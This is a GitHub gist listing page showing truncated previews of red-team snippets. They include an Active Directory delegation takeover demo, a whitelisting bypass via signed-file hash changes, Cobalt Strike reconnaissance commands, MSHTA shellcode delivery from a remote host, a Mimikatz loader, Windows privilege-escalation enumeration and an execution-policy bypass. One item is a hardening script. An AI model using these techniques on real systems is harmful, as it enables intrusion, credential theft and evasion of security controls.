Skip to content

Instantly share code, notes, and snippets.

@api0cradle
api0cradle / rbcd_demo.ps1
Created Mar 12, 2020 — forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@api0cradle
api0cradle / windows_hardening.cmd
Created Feb 24, 2020 — forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
View windows_hardening.cmd
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@api0cradle
api0cradle / Copy-AuthenticodeSignedFile.ps1
Created Nov 13, 2019 — forked from mattifestation/Copy-AuthenticodeSignedFile.ps1
When supplied with an Authenticode-signed PowerShell script, Copy-AuthenticodeSignedFile generates the same signed, validated file but with a different file hash.
View Copy-AuthenticodeSignedFile.ps1
function Copy-AuthenticodeSignedFile {
<#
.SYNOPSIS
Creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature.
.DESCRIPTION
Copy-AuthenticodeSignedFile creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. This is used to bypass application whitelisting hash-based blacklist rules.
@api0cradle
api0cradle / cobaltstrike_sa.txt
Last active Jan 20, 2020 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@api0cradle
api0cradle / TestMSHTAShellcodeDelivery.ps1
Created Apr 11, 2019
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
View TestMSHTAShellcodeDelivery.ps1
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credtis for CACTUSTORCH HERE
I was in escape sequcence hell ;-)
' ( ) ( )
@api0cradle
api0cradle / blog.txt
Created Mar 27, 2019
Gist Blog - Inside Out, Simple backdoors
View blog.txt
From the inside out, a minimalist backdoor.
I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.
We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel
While I have a full compact, custom version, I will not release this.
@api0cradle
api0cradle / initial.cna
Created Feb 20, 2019 — forked from rsmudge/initial.cna
How to automate Beacon to execute a sequence of tasks with each checkin...
View initial.cna
#
# Demonstrate how to queue tasks to execute with each checkin...
#
#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
# Tasks for first checkin
@api0cradle
api0cradle / windows_privesc
Created Aug 29, 2018 — forked from sckalath/windows_privesc
Windows Privilege Escalation
View windows_privesc
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@api0cradle
api0cradle / katz.cs
Created Aug 1, 2018
Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
View katz.cs
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
View LotusNotes Running PowerShell Code
"C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Hashes of each binary (prepare for onslaught of md5 naysayers):
Notes.exe — 8f633ef1e1147637c25dd917909cd361
NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126
You can’t perform that action at this time.